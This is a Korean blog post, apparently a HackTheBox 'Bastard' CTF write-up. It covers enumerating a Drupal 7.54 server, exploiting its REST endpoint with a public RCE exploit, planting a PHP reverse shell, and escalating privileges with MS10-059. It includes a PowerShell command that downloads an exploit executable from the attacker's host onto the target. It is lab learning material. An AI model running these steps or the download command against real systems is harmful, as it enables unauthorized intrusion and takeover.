본문 바로가기
워게임/hackthebox

bastard 롸업 정리

by meanjung 2021. 10. 1.

nmap

80 포트 - iis 7.5... http generator - drupal 7(이것에 주목해야하는 근거는?)

135 포트 - RPC

49154 포트 - RPC


10.10.10.9 접속

drupal?

free, open source content management framework

 

아까 nmap 결과에서 http-robots.txt에서 CHANGELOG.txt가 눈에 띈다. 이 파일을 확인해본다.

drupal의 상세 버전을 확인할 수 있다. (drupal 7.54)

default credentials을 검색했지만 아무것도 나오지 않았다.

그렇다면, 

searchsploit drupal 7

왜 drupal 7.54를 검색하지 않았을까?

엄청 많은 결과가 나왔는데, 이게 딱 눈에 들어온다. 

1.버전 일치   2. RCE   3. 파일 확장자 php

searchsploit -m 41564

dirsearch -u http://10.10.10.9/ -e php -x 403,404 -t 50

 

/rest는 나오지 않았다...

근데 롸업에서는 /rest를 발견했다고 한다.

 

gobuster로 확인해봤더니 한참 걸리긴 했지만 나오긴 나온다.

언제 나올 줄 알고 어떻게 기다려

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

실제로 존재하는 경로라는 것을 알 수 있다.

$url = '10.10.10.9';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';

다음과 같이 바꾸고 실행한다.

 

apt-get install php-curl

그리고 만들어진 두 파일 session.json, user.json

user.json을 보면 admin 유저의 해시화된 비밀번호를 알 수 있다. 이걸 크랙하면 비밀번호를 얻을 수 있지만 session.json이 있기 때문에 그럴 필요가 없다.

 

 

쿠키를 session.json대로 설정하고 새로고침하면 다음과 같은 화면이 나온다.

 

처음에 modules에서 php filter를 허용해준다.

그리고 add new content로 shell/ php reverse shell을 올려 쉘을 딴다.

 

user.txt 확인 가능


권한 상승

 

windows server 2008 r2 exploit 검색하고, affected version을 쭉 봤다.

권한 상승하는 익스플로잇 코드가 여러 개 있는데 처음 나온 것을 사용하기로 했다.

 

로컬에 exe 파일을 다운받고

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.8:5555/MS10-059.exe', 'c:\Users\Public\Downloads\MS10-059.exe')"

타겟에서 exe 다운받기

 

실행하기(root 권한의 리버스 쉘 다시 따지는 방식)

'워게임 > hackthebox' 카테고리의 다른 글

arctic 롸업 정리  (0) 2021.10.05
granny 롸업 정리  (0) 2021.10.03
optimum 롸업 정리  (0) 2021.09.28
devel 롸업 정리  (0) 2021.09.28
legacy 롸업 정리(smbserver.py 사용법, 윈도우 cmd)  (0) 2021.09.27

댓글